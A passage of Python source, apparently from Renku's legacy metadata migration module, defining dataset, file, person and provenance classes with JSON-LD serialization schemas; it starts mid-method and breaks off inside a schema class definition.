\"\"\"Return name, email, and affiliation.\"\"\"\n email = f\" <{email}>\" if email else \"\"\n affiliation = f\" [{affiliation}]\" if affiliation else \"\"\n return f\"{name}{email}{affiliation}\"\n\n @classmethod\n def from_repository(cls, repository):\n \"\"\"Create an instance from a repository.\"\"\"\n user = repository.get_user()\n return cls(email=user.email, name=user.name)\n\n @classmethod\n def from_string(cls, string):\n \"\"\"Create an instance from a 'Name ' string.\"\"\"\n regex_pattern = r\"([^<>\\[\\]]*)\" r\"(?:<{1}\\s*(\\S+@\\S+\\.\\S+){0,1}\\s*>{1}){0,1}\\s*\" r\"(?:\\[{1}(.*)\\]{1}){0,1}\"\n name, email, affiliation = re.search(regex_pattern, string).groups()\n if name:\n name = name.strip()\n if affiliation:\n affiliation = affiliation.strip()\n affiliation = affiliation or None\n\n return cls(affiliation=affiliation, email=email, name=name)\n\n @classmethod\n def from_dict(cls, data):\n \"\"\"Create and instance from a dictionary.\"\"\"\n return cls(**data)\n\n @classmethod\n def from_jsonld(cls, data):\n \"\"\"Create an instance from JSON-LD data.\"\"\"\n if isinstance(data, cls):\n return data\n if not isinstance(data, dict):\n raise ValueError(data)\n\n return OldPersonSchema().load(data)\n\n\nclass SoftwareAgent:\n \"\"\"Represent executed software.\"\"\"\n\n __slots__ = (\"id\", \"label\")\n\n def __init__(self, *, id: str, label: str):\n self.id: str = id\n self.label: str = label\n\n def __eq__(self, other):\n if self is other:\n return True\n if not isinstance(other, SoftwareAgent):\n return False\n return self.id == other.id and self.label == other.label\n\n def __hash__(self):\n return hash((self.id, self.label))\n\n @classmethod\n def from_commit(cls, commit):\n \"\"\"Create an instance from a Git commit.\"\"\"\n # FIXME: This method can return a Person object but SoftwareAgent is not its super class\n author = Person.from_commit(commit)\n if commit.author != commit.committer:\n return cls(label=commit.committer.name, id=commit.committer.email)\n return author\n\n\n@attr.s\nclass CreatorMixin:\n \"\"\"Mixin for handling creators container.\"\"\"\n\n creators = attr.ib(kw_only=True, converter=_convert_creators)\n\n @property\n def creators_csv(self):\n \"\"\"Comma-separated list of creators associated with dataset.\"\"\"\n return \", \".join(creator.name for creator in self.creators)\n\n @property\n def creators_full_csv(self):\n \"\"\"Comma-separated list of creators with full identity.\"\"\"\n return \", \".join(creator.full_identity for creator in self.creators)\n\n\ndef _extract_doi(value):\n \"\"\"Return either a string or the doi part of a URL.\"\"\"\n value = str(value)\n if is_doi(value):\n return extract_doi(value)\n return value\n\n\n@attr.s(slots=True)\nclass DatasetTag:\n \"\"\"Represents a Tag of an instance of a dataset.\"\"\"\n\n name = attr.ib(default=None, kw_only=True, validator=instance_of(str))\n\n description = attr.ib(default=None, kw_only=True, validator=instance_of(str))\n\n commit = attr.ib(default=None, kw_only=True, validator=instance_of(str))\n\n created = attr.ib(converter=parse_date, kw_only=True)\n\n dataset = attr.ib(default=None, kw_only=True)\n\n _id = attr.ib(default=None, kw_only=True)\n\n @created.default\n def _now(self):\n \"\"\"Define default value for datetime fields.\"\"\"\n return datetime.datetime.now(datetime.timezone.utc)\n\n def default_id(self):\n \"\"\"Define default value for id field.\"\"\"\n return generate_dataset_tag_id(name=self.name, commit=self.commit)\n\n def __attrs_post_init__(self):\n \"\"\"Post-Init hook.\"\"\"\n if not self._id or self._id.startswith(\"_:\"):\n self._id = self.default_id()\n\n @classmethod\n def from_jsonld(cls, data):\n \"\"\"Create an instance from JSON-LD data.\"\"\"\n if isinstance(data, cls):\n return data\n if not isinstance(data, dict):\n raise ValueError(data)\n\n return OldDatasetTagSchema().load(data)\n\n def as_jsonld(self):\n \"\"\"Create JSON-LD.\"\"\"\n return OldDatasetTagSchema().dump(self)\n\n\n@attr.s(slots=True)\nclass Language:\n \"\"\"Represent a language of an object.\"\"\"\n\n alternate_name = attr.ib(default=None, kw_only=True)\n name = attr.ib(default=None, kw_only=True)\n\n @classmethod\n def from_jsonld(cls, data):\n \"\"\"Create an instance from JSON-LD data.\"\"\"\n if isinstance(data, cls):\n return data\n if not isinstance(data, dict):\n raise ValueError(data)\n\n return OldLanguageSchema().load(data)\n\n\ndef convert_filename_path(p):\n \"\"\"Return name of the file.\"\"\"\n if p:\n return Path(p).name\n\n\ndef convert_based_on(v):\n \"\"\"Convert based_on to DatasetFile.\"\"\"\n if v:\n return DatasetFile.from_jsonld(v)\n\n\n@attr.s(slots=True)\nclass DatasetFile(Entity):\n \"\"\"Represent a file in a dataset.\"\"\"\n\n added = attr.ib(converter=parse_date, kw_only=True)\n\n checksum = attr.ib(default=None, kw_only=True)\n\n filename = attr.ib(kw_only=True, converter=convert_filename_path)\n\n name = attr.ib(kw_only=True, default=None)\n\n filesize = attr.ib(default=None, kw_only=True)\n\n filetype = attr.ib(default=None, kw_only=True)\n\n url = attr.ib(default=None, kw_only=True)\n\n based_on = attr.ib(default=None, kw_only=True, converter=convert_based_on)\n\n external = attr.ib(default=False, kw_only=True)\n\n source = attr.ib(default=None, kw_only=True)\n\n @added.default\n def _now(self):\n \"\"\"Define default value for datetime fields.\"\"\"\n return datetime.datetime.now(datetime.timezone.utc)\n\n @filename.default\n def default_filename(self):\n \"\"\"Generate default filename based on path.\"\"\"\n if self.path:\n return Path(self.path).name\n\n def default_url(self):\n \"\"\"Generate default url based on project's ID.\"\"\"\n return generate_dataset_file_url(filepath=self.path)\n\n @property\n def commit_sha(self):\n \"\"\"Return commit hash.\"\"\"\n return self.commit.hexsha if self.commit else \"\"\n\n @property\n def full_path(self):\n \"\"\"Return full path in the current reference frame.\"\"\"\n path = project_context.path / self.path\n return Path(os.path.abspath(path))\n\n def __attrs_post_init__(self):\n \"\"\"Set the property \"name\" after initialization.\"\"\"\n super().__attrs_post_init__()\n\n if not self.filename:\n self.filename = self.default_filename()\n\n if not self.name:\n self.name = self.filename\n\n parsed_id = urlparse(self._id)\n\n if not parsed_id.scheme:\n self._id = f\"file://{self._id}\"\n\n if not self.url:\n self.url = self.default_url()\n\n def update_commit(self, commit):\n \"\"\"Set commit and update associated fields.\"\"\"\n self.commit = commit\n self._id = self.default_id()\n self._label = self.default_label()\n\n def update_metadata(self, path, commit):\n \"\"\"Update files metadata.\"\"\"\n self.path = str((project_context.path / path).relative_to(project_context.path))\n self.update_commit(commit)\n self.filename = self.default_filename()\n self.url = self.default_url()\n self.added = self._now()\n\n @classmethod\n def from_jsonld(cls, data):\n \"\"\"Create an instance from JSON-LD data.\"\"\"\n if isinstance(data, cls):\n return data\n if not isinstance(data, dict):\n raise ValueError(data)\n\n return OldDatasetFileSchema().load(data)\n\n def as_jsonld(self):\n \"\"\"Create JSON-LD.\"\"\"\n return OldDatasetFileSchema().dump(self)\n\n\ndef _convert_dataset_files(value):\n \"\"\"Convert dataset files.\"\"\"\n coll = value\n\n if isinstance(coll, dict): # compatibility with previous versions\n if any([key.startswith(\"@\") for key in coll.keys()]):\n return [DatasetFile.from_jsonld(coll)]\n else:\n coll = value.values()\n\n return [DatasetFile.from_jsonld(v) for v in coll]\n\n\ndef _convert_dataset_tags(value):\n \"\"\"Convert dataset tags.\"\"\"\n if isinstance(value, dict): # compatibility with previous versions\n value = [value]\n\n return [DatasetTag.from_jsonld(v) for v in value]\n\n\ndef _convert_language(obj):\n \"\"\"Convert language object.\"\"\"\n return Language.from_jsonld(obj) if isinstance(obj, dict) else obj\n\n\ndef _convert_keyword(keywords):\n \"\"\"Convert keywords collection.\"\"\"\n if isinstance(keywords, (list, tuple)):\n return keywords\n\n if isinstance(keywords, dict):\n return keywords.keys()\n\n\n@attr.s\nclass Dataset(Entity, CreatorMixin):\n \"\"\"Represent a dataset.\"\"\"\n\n _id = attr.ib(default=None, kw_only=True)\n _label = attr.ib(default=None, kw_only=True)\n\n date_published = attr.ib(default=None, kw_only=True)\n\n description = attr.ib(default=None, kw_only=True)\n\n identifier = attr.ib(default=attr.Factory(uuid.uuid4), kw_only=True, converter=_extract_doi)\n\n in_language = attr.ib(default=None, converter=_convert_language, kw_only=True)\n\n images = attr.ib(default=None, kw_only=True)\n\n keywords = attr.ib(converter=_convert_keyword, kw_only=True, default=None)\n\n license = attr.ib(default=None, kw_only=True)\n\n title = attr.ib(default=None, type=str, kw_only=True)\n\n url = attr.ib(default=None, kw_only=True)\n\n version = attr.ib(default=None, kw_only=True)\n\n date_created = attr.ib(converter=parse_date, kw_only=True)\n\n files = attr.ib(factory=list, converter=_convert_dataset_files, kw_only=True)\n\n tags = attr.ib(factory=list, converter=_convert_dataset_tags, kw_only=True)\n\n same_as = attr.ib(default=None, kw_only=True)\n\n name = attr.ib(default=None, kw_only=True)\n\n derived_from = attr.ib(default=None, kw_only=True)\n\n immutable = attr.ib(default=False, kw_only=True)\n\n _modified = attr.ib(default=False, init=False)\n\n _mutated = attr.ib(default=False, init=False)\n\n _metadata_path = attr.ib(default=None, init=False)\n\n @date_created.default\n def _now(self):\n \"\"\"Define default value for datetime fields.\"\"\"\n return datetime.datetime.now(datetime.timezone.utc)\n\n @property\n def short_id(self):\n \"\"\"Shorter version of identifier.\"\"\"\n if is_doi(self.identifier):\n return self.identifier\n return str(self.identifier)[:8]\n\n @property\n def creators_csv(self):\n \"\"\"Comma-separated list of creators associated with dataset.\"\"\"\n return \", \".join(creator.name for creator in self.creators)\n\n @property\n def keywords_csv(self):\n \"\"\"Comma-separated list of keywords associated with dataset.\"\"\"\n return \", \".join(self.keywords or [])\n\n @property\n def tags_csv(self):\n \"\"\"Comma-separated list of tags associated with dataset.\"\"\"\n return \",\".join(tag.name for tag in self.tags)\n\n @property\n def initial_identifier(self):\n \"\"\"Return the first identifier of the dataset.\"\"\"\n if self.path:\n return Path(self.path).name\n\n def contains_any(self, files):\n \"\"\"Check if files are already within a dataset.\"\"\"\n for file_ in files:\n if self.find_file(file_[\"path\"]):\n return True\n return False\n\n def find_files(self, paths):\n \"\"\"Return all paths that are in files container.\"\"\"\n files_paths = {str(project_context.path / f.path) for f in self.files}\n return {p for p in paths if str(p) in files_paths}\n\n def find_file(self, path, return_index=False):\n \"\"\"Find a file in files container using its relative path.\"\"\"\n for index, file in enumerate(self.files):\n if str(file.path) == str(path):\n if return_index:\n return index\n return file\n\n def update_metadata(self, **kwargs):\n \"\"\"Updates instance attributes.\"\"\"\n for attribute, value in kwargs.items():\n if value and value != getattr(self, attribute):\n self._modified = True\n setattr(self, attribute, value)\n\n return self\n\n def update_files(self, files):\n \"\"\"Update files with collection of DatasetFile objects.\"\"\"\n if isinstance(files, DatasetFile):\n files = (files,)\n\n new_files = []\n\n for new_file in files:\n old_file = self.find_file(new_file.path)\n if not old_file:\n new_files.append(new_file)\n elif new_file.commit != old_file.commit or new_file.added != old_file.added:\n self.unlink_file(new_file.path)\n new_files.append(new_file)\n\n if not new_files:\n return\n\n self._modified = True\n self.files += new_files\n\n def unlink_file(self, path, missing_ok=False): # FIXME: Remove unused code\n \"\"\"Unlink a file from dataset.\n\n Args:\n path: Relative path used as key inside files container.\n missing_ok (bool): Whether to ignore missing files or raise an error (Default value = False).\n \"\"\"\n index = self.find_file(path, return_index=True)\n if index is not None:\n self._modified = True\n return self.files.pop(index)\n\n if not missing_ok:\n raise errors.InvalidFileOperation(f\"File cannot be found: {path}\")\n\n def mutate(self):\n \"\"\"Update mutation history and assign a new identifier.\n\n Do not mutate more than once before committing the metadata or otherwise there would be missing links in the\n chain of changes.\n \"\"\"\n if self.immutable:\n raise errors.OperationError(f\"Cannot mutate an immutable dataset: {self.name}\")\n\n # As a safetynet, we only allow one mutation during lifetime of a dataset object; this is not 100% error-proof\n # because one can create a new object from a mutated but uncommitted metadata file.\n if self._mutated:\n return\n self._mutated = True\n\n self.same_as = None\n self.derived_from = Url(url_id=self._id)\n\n repository = project_context.repository\n mutator = Person.from_repository(repository)\n if not any(c for c in self.creators if c.email == mutator.email):\n self.creators.append(mutator)\n\n self.date_created = self._now()\n self.date_published = None\n\n self._replace_identifier(new_identifier=str(uuid.uuid4()))\n\n def _replace_identifier(self, new_identifier):\n \"\"\"Replace identifier and update all related fields.\"\"\"\n self.identifier = new_identifier\n self._set_id()\n self.url = self._id\n self._label = self.identifier\n\n def _set_id(self):\n self._id = generate_dataset_id(identifier=self.identifier)\n\n def __attrs_post_init__(self):\n \"\"\"Post-Init hook.\"\"\"\n super().__attrs_post_init__()\n\n self._set_id()\n self.url = self._id\n self._label = self.identifier\n\n if self.derived_from:\n host = get_host()\n derived_from_id = self.derived_from._id\n derived_from_url = self.derived_from.url.get(\"@id\")\n u = urlparse(derived_from_url)\n derived_from_url = u._replace(netloc=host).geturl()\n self.derived_from = Url(id=derived_from_id, url_id=derived_from_url)\n\n # if `date_published` is set, we are probably dealing with\n # an imported dataset so `date_created` is not needed\n if self.date_published:\n self.date_created = None\n\n if not self.path:\n absolute_path = LinkReference(\n metadata_path=project_context.metadata_path, name=f\"datasets/{self.name}\"\n ).reference.parent\n self.path = str(absolute_path.relative_to(project_context.path))\n\n if project_context.has_context():\n try:\n revision = self.commit.hexsha if self.commit else \"HEAD\"\n repository = project_context.repository\n self.commit = repository.get_previous_commit(os.path.join(self.path, \"metadata.yml\"), revision=revision)\n except errors.GitCommitNotFoundError:\n pass\n\n if not self.name:\n self.name = generate_default_name(self.title, self.version)\n\n @classmethod\n def from_yaml(cls, path, commit=None):\n \"\"\"Return an instance from a YAML file.\"\"\"\n data = yaml.read_yaml(path)\n\n self = cls.from_jsonld(data=data, commit=commit)\n self._metadata_path = path\n\n return self\n\n @classmethod\n def from_jsonld(cls, data, commit=None, schema_class=None):\n \"\"\"Create an instance from JSON-LD data.\"\"\"\n if isinstance(data, cls):\n return data\n if not isinstance(data, (dict, list)):\n raise ValueError(data)\n\n schema_class = schema_class or OldDatasetSchema\n return schema_class(commit=commit, flattened=True).load(data)\n\n def to_yaml(self, path=None, immutable=False):\n \"\"\"Write an instance to the referenced YAML file.\"\"\"\n if self._modified and not (immutable or self.immutable):\n self.mutate()\n\n self._metadata_path = path or self._metadata_path\n data = OldDatasetSchema(flattened=True).dump(self)\n yaml.write_yaml(path=self._metadata_path, data=data)\n\n def as_jsonld(self):\n \"\"\"Create JSON-LD.\"\"\"\n return OldDatasetSchema(flattened=True).dump(self)\n\n\nclass ImageObject:\n \"\"\"Represents a schema.org `ImageObject`.\"\"\"\n\n def __init__(self, content_url: str, position: int, id=None):\n self.content_url = content_url\n self.position = position\n self.id = id\n\n @staticmethod\n def generate_id(dataset: Dataset, position: int) -> str:\n \"\"\"Generate @id field.\"\"\"\n return urljoin(dataset._id + \"/\", posixpath.join(\"images\", str(position)))\n\n @property\n def is_absolute(self):\n \"\"\"Whether content_url is an absolute or relative url.\"\"\"\n return bool(urlparse(self.content_url).netloc)\n\n\nclass OldPersonSchema(JsonLDSchema):\n \"\"\"Person schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = [prov.Person, schema.Person]\n model = Person\n unknown = EXCLUDE\n\n affiliation = StringList(schema.affiliation, load_default=None)\n alternate_name = StringList(schema.alternateName, load_default=None)\n email = fields.String(schema.email, load_default=None)\n id = fields.Id()\n label = StringList(rdfs.label, load_default=None)\n name = StringList(schema.name, load_default=None)\n\n\nclass ProjectSchema(JsonLDSchema):\n \"\"\"Project Schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = [schema.Project, prov.Location]\n model = Project\n unknown = EXCLUDE\n\n name = fields.String(schema.name, load_default=None)\n created = DateTimeList(schema.dateCreated, load_default=None, format=\"iso\", extra_formats=(\"%Y-%m-%d\",))\n version = StringList(schema.schemaVersion, load_default=\"1\")\n agent_version = StringList(schema.agent, load_default=\"pre-0.11.0\")\n template_source = fields.String(renku.templateSource, load_default=None)\n template_ref = fields.String(renku.templateReference, load_default=None)\n template_id = fields.String(renku.templateId, load_default=None)\n template_version = fields.String(renku.templateVersion, load_default=None)\n template_metadata = fields.String(renku.templateMetadata, load_default=None)\n immutable_template_files = fields.List(renku.immutableTemplateFiles, fields.String(), load_default=[])\n automated_update = fields.Boolean(renku.automatedTemplateUpdate, load_default=True)\n creator = Nested(schema.creator, OldPersonSchema, load_default=None)\n _id = fields.Id(init_name=\"id\", load_default=None)\n\n @pre_dump\n def fix_datetimes(self, obj, many=False, **kwargs):\n \"\"\"Pre dump hook.\"\"\"\n if many:\n return [self.fix_datetimes(o, many=False, **kwargs) for o in obj]\n obj.created = fix_datetime(obj.created)\n return obj\n\n\nclass OldCommitMixinSchema(JsonLDSchema):\n \"\"\"CommitMixin schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n model = CommitMixin\n\n path = fields.String(prov.atLocation)\n _id = fields.Id(init_name=\"id\")\n _label = fields.String(rdfs.label, init_name=\"label\", load_default=None)\n _project = Nested(\n schema.isPartOf, [ProjectSchema, \"V9ProjectSchema\", V10ProjectSchema], init_name=\"project\", load_default=None\n )\n\n\nclass OldEntitySchema(OldCommitMixinSchema):\n \"\"\"Entity Schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = [prov.Entity, wfprov.Artifact]\n model = Entity\n\n checksum = fields.String(renku.checksum, load_default=None)\n\n\nclass OldCollectionSchema(OldEntitySchema):\n \"\"\"Entity Schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = [prov.Collection]\n model = Collection\n\n members = Nested(prov.hadMember, [OldEntitySchema, \"OldCollectionSchema\"], many=True)\n\n\nclass OldSoftwareAgentSchema(JsonLDSchema):\n \"\"\"SoftwareAgent schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = [prov.SoftwareAgent, wfprov.WorkflowEngine]\n model = SoftwareAgent\n unknown = EXCLUDE\n\n label = fields.String(rdfs.label)\n id = fields.Id()\n\n\nclass OldCreatorMixinSchema(JsonLDSchema):\n \"\"\"CreatorMixin schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n unknown = EXCLUDE\n\n creators = Nested(schema.creator, OldPersonSchema, many=True)\n\n\nclass OldUrlSchema(JsonLDSchema):\n \"\"\"Url schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = schema.URL\n model = Url\n unknown = EXCLUDE\n\n url = Uri(schema.url, load_default=None)\n _id = fields.Id(init_name=\"id\", load_default=None)\n\n\nclass OldDatasetTagSchema(JsonLDSchema):\n \"\"\"DatasetTag schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = schema.PublicationEvent\n model = DatasetTag\n unknown = EXCLUDE\n\n name = fields.String(schema.name)\n description = fields.String(schema.description, load_default=None)\n commit = fields.String(schema.location)\n created = fields.DateTime(schema.startDate, load_default=None, format=\"iso\", extra_formats=(\"%Y-%m-%d\",))\n dataset = fields.String(schema.about)\n _id = fields.Id(init_name=\"id\")\n\n @pre_dump\n def fix_datetimes(self, obj, many=False, **kwargs):\n \"\"\"Pre dump hook.\"\"\"\n if many:\n return [self.fix_datetimes(o, many=False, **kwargs) for o in obj]\n object.__setattr__(obj, \"created\", fix_datetime(obj.created))\n return obj\n\n\nclass OldLanguageSchema(JsonLDSchema):\n \"\"\"Language schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = schema.Language\n model = Language\n unknown = EXCLUDE\n\n alternate_name = fields.String(schema.alternateName)\n name = fields.String(schema.name)\n\n\nclass OldDatasetFileSchema(OldEntitySchema):\n \"\"\"DatasetFile schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = schema.DigitalDocument\n model = DatasetFile\n unknown = EXCLUDE\n\n added = DateTimeList(schema.dateCreated, format=\"iso\", extra_formats=(\"%Y-%m-%d\",))\n name = fields.String(schema.name, load_default=None)\n url = fields.String(schema.url, load_default=None)\n based_on = Nested(schema.isBasedOn, \"OldDatasetFileSchema\", load_default=None)\n external = fields.Boolean(renku.external, load_default=False)\n source = fields.String(renku.source, load_default=None)\n\n @pre_dump\n def fix_datetimes(self, obj, many=False, **kwargs):\n \"\"\"Pre dump hook.\"\"\"\n if many:\n return [self.fix_datetimes(o, many=False, **kwargs) for o in obj]\n obj.added = fix_datetime(obj.added)\n return obj\n\n\nclass OldImageObjectSchema(JsonLDSchema):\n \"\"\"ImageObject schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = schema.ImageObject\n model = ImageObject\n unknown = EXCLUDE\n\n id = fields.Id(load_default=None)\n content_url = fields.String(schema.contentUrl)\n position = fields.Integer(schema.position)\n\n\nclass OldDatasetSchema(OldEntitySchema, OldCreatorMixinSchema):\n \"\"\"Dataset schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = schema.Dataset\n model = Dataset\n unknown = EXCLUDE\n\n _id = fields.Id(init_name=\"id\", load_default=None)\n _label = fields.String(rdfs.label, init_name=\"label\", load_default=None)\n date_published = fields.DateTime(\n schema.datePublished,\n load_default=None,\n allow_none=True,\n format=\"%Y-%m-%d\",\n extra_formats=(\"iso\", \"%Y-%m-%dT%H:%M:%S\"),\n )\n description = fields.String(schema.description, load_default=None)\n identifier = fields.String(schema.identifier)\n in_language = Nested(schema.inLanguage, OldLanguageSchema, load_default=None)\n images = fields.Nested(schema.image, OldImageObjectSchema, many=True, load_default=None, allow_none=True)\n keywords = fields.List(schema.keywords, fields.String(), allow_none=True, load_default=None)\n license = Uri(schema.license, allow_none=True, load_default=None)\n title = fields.String(schema.name)\n url = fields.String(schema.url, load_default=None)\n version = fields.String(schema.version, load_default=None)\n date_created = fields.DateTime(\n schema.dateCreated, load_default=None, allow_none=True, format=\"iso\", extra_formats=(\"%Y-%m-%d\",)\n )\n files = Nested(schema.hasPart, OldDatasetFileSchema, many=True)\n tags = Nested(schema.subjectOf, OldDatasetTagSchema, many=True)\n same_as = Nested(schema.sameAs, OldUrlSchema, load_default=None)\n name = fields.String(schema.alternateName)\n derived_from = Nested(prov.wasDerivedFrom, OldUrlSchema, load_default=None)\n\n @pre_dump\n def fix_datetimes(self, obj, many=False, **kwargs):\n \"\"\"Pre dump hook.\"\"\"\n if many:\n return [self.fix_datetimes(o, many=False, **kwargs) for o in obj]\n obj.date_published = fix_datetime(obj.date_published)\n obj.date_created = fix_datetime(obj.date_created)\n return obj\n\n\ndef get_project_datasets():\n \"\"\"Return Dataset migration models for a project.\"\"\"\n paths = get_datasets_path().rglob(OLD_METADATA_PATH)\n return [Dataset.from_yaml(path=path) for path in paths]\n\n\ndef generate_label(path, hexsha):\n \"\"\"Generate label field.\"\"\"\n return f\"{path}@{hexsha}\"\n\n\ndef generate_file_id(hexsha, path):\n \"\"\"Generate DatasetFile id field.\"\"\"\n # Determine the hostname for the resource URIs.\n # If RENKU_DOMAIN is set, it overrides the host from remote.\n # Default is localhost.\n host = \"localhost\"\n host = project_context.remote.host or host\n host = os.environ.get(\"RENKU_DOMAIN\") or host\n\n # TODO: Use plural name for entity id: /blob/ -> /blobs/\n # always set the id by the identifier\n return urljoin(f\"https://{host}\", posixpath.join(f\"/blob/{hexsha}/{quote(str(path))}\"))\n\n\nclass MappedIOStreamSchema(JsonLDSchema):\n \"\"\"MappedIOStream schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = [renku.IOStream]\n model = MappedIOStream\n unknown = EXCLUDE\n\n _id = fields.Id(init_name=\"id\")\n _label = fields.String(rdfs.label, init_name=\"label\")\n stream_type = fields.String(renku.streamType)\n\n\nclass CommandParameterSchema(JsonLDSchema):\n \"\"\"CommandParameter schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = [renku.CommandParameter] # , schema.PropertyValueSpecification]\n model = CommandParameter\n unknown = EXCLUDE\n\n _id = fields.Id(init_name=\"id\")\n _label = fields.String(rdfs.label, init_name=\"label\")\n default_value = fields.Raw(schema.defaultValue, load_default=None)\n description = fields.String(schema.description, load_default=None)\n name = fields.String(schema.name, load_default=None)\n position = fields.Integer(renku.position, load_default=None)\n prefix = fields.String(renku.prefix, load_default=None)\n\n\nclass CommandArgumentSchema(CommandParameterSchema):\n \"\"\"CommandArgument schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = [renku.CommandArgument]\n model = CommandArgument\n unknown = EXCLUDE\n\n value = fields.String(renku.value)\n\n\nclass CommandInputSchema(CommandParameterSchema):\n \"\"\"CommandArgument schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = [renku.CommandInput]\n model = CommandInput\n unknown = EXCLUDE\n\n consumes = Nested(renku.consumes, [OldEntitySchema, OldCollectionSchema])\n mapped_to = Nested(renku.mappedTo, MappedIOStreamSchema, load_default=None)\n\n\nclass CommandOutputSchema(CommandParameterSchema):\n \"\"\"CommandArgument schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = [renku.CommandOutput]\n model = CommandOutput\n unknown = EXCLUDE\n\n create_folder = fields.Boolean(renku.createFolder)\n produces = Nested(renku.produces, [OldEntitySchema, OldCollectionSchema])\n mapped_to = Nested(renku.mappedTo, MappedIOStreamSchema, load_default=None)\n\n\nclass RunParameterSchema(JsonLDSchema):\n \"\"\"RunParameter schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = [renku.RunParameter]\n model = RunParameter\n unknown = EXCLUDE\n\n _id = fields.Id(init_name=\"id\")\n _label = fields.String(rdfs.label, init_name=\"label\")\n name = fields.String(schema.name)\n value = fields.String(renku.value)\n type = fields.String(renku.type)\n\n\nclass RunSchema(OldCommitMixinSchema):\n \"\"\"Run schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = [renku.Run, prov.Plan, prov.Entity]\n model = Run\n unknown = EXCLUDE\n\n command = fields.String(renku.command, load_default=None)\n successcodes = fields.List(renku.successCodes, fields.Integer(), load_default=[0])\n subprocesses = Nested(renku.hasSubprocess, nested=\"OrderedSubprocessSchema\", load_default=None, many=True)\n arguments = Nested(renku.hasArguments, CommandArgumentSchema, many=True, load_default=None)\n inputs = Nested(renku.hasInputs, CommandInputSchema, many=True, load_default=None)\n outputs = Nested(renku.hasOutputs, CommandOutputSchema, many=True, load_default=None)\n run_parameters = Nested(renku.hasRunParameters, RunParameterSchema, many=True, load_default=None)\n name = fields.String(schema.name, load_default=None)\n description = fields.String(schema.description, load_default=None)\n keywords = fields.List(schema.keywords, fields.String(), load_default=None)\n\n\nclass OrderedSubprocessSchema(JsonLDSchema):\n \"\"\"OrderedSubprocess schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = [renku.OrderedSubprocess]\n model = OrderedSubprocess\n unknown = EXCLUDE\n\n _id = fields.Id(init_name=\"id\")\n index = fields.Integer(renku.index)\n process = Nested(renku.process, RunSchema)\n\n\nclass AssociationSchema(JsonLDSchema):\n \"\"\"Association schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = prov.Association\n model = Association\n unknown = EXCLUDE\n\n _id = fields.Id(init_name=\"id\")\n plan = Nested(prov.hadPlan, [RunSchema])\n agent = Nested(prov.agent, [OldSoftwareAgentSchema, OldPersonSchema])\n\n\nclass UsageSchema(JsonLDSchema):\n \"\"\"Usage schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = prov.Usage\n model = Usage\n unknown = EXCLUDE\n\n _id = fields.Id(init_name=\"id\")\n entity = Nested(prov.entity, [OldEntitySchema, OldCollectionSchema, OldDatasetSchema, OldDatasetFileSchema])\n role = fields.String(prov.hadRole, load_default=None)\n\n\nclass GenerationSchema(JsonLDSchema):\n \"\"\"Generation schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = prov.Generation\n model = Generation\n unknown = EXCLUDE\n\n _id = fields.Id(init_name=\"id\")\n entity = Nested(\n prov.qualifiedGeneration,\n [OldEntitySchema, OldCollectionSchema, OldDatasetSchema, OldDatasetFileSchema],\n reverse=True,\n )\n role = fields.String(prov.hadRole, load_default=None)\n\n\nclass ActivitySchema(OldCommitMixinSchema):\n \"\"\"Activity schema.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n rdf_type = prov.Activity\n model = Activity\n unknown = EXCLUDE\n\n _message = fields.String(rdfs.comment, init_name=\"message\", load_default=None)\n _was_informed_by = fields.List(prov.wasInformedBy, fields.IRI(), init_name=\"was_informed_by\")\n generated = Nested(prov.activity, GenerationSchema, reverse=True, many=True, load_default=None)\n invalidated = Nested(\n prov.wasInvalidatedBy, [OldEntitySchema, OldCollectionSchema], reverse=True, many=True, load_default=None\n )\n influenced = Nested(prov.influenced, OldCollectionSchema, many=True)\n started_at_time = fields.DateTime(prov.startedAtTime, format=\"iso\", add_value_types=True)\n ended_at_time = fields.DateTime(prov.endedAtTime, format=\"iso\", add_value_types=True)\n agents = Nested(prov.wasAssociatedWith, [OldPersonSchema, OldSoftwareAgentSchema], many=True)\n\n @pre_dump(pass_many=True)\n def removes_ms(self, objs, many, **kwargs):\n \"\"\"Remove milliseconds from datetimes.\n\n Note: since DateField uses `strftime` as format, which only supports timezone info without a colon\n e.g. `+0100` instead of `+01:00`, we have to deal with milliseconds manually instead of using a format string.\n \"\"\"\n\n def _replace_times(obj):\n obj.started_at_time = obj.started_at_time.replace(microsecond=0)\n obj.ended_at_time = obj.ended_at_time.replace(microsecond=0)\n\n if many:\n for obj in objs:\n _replace_times(obj)\n return objs\n\n _replace_times(objs)\n return objs\n\n\nclass ProcessRunSchema(ActivitySchema):\n \"\"\"ProcessRun schema.\"\"\"\n\n class Meta:\n 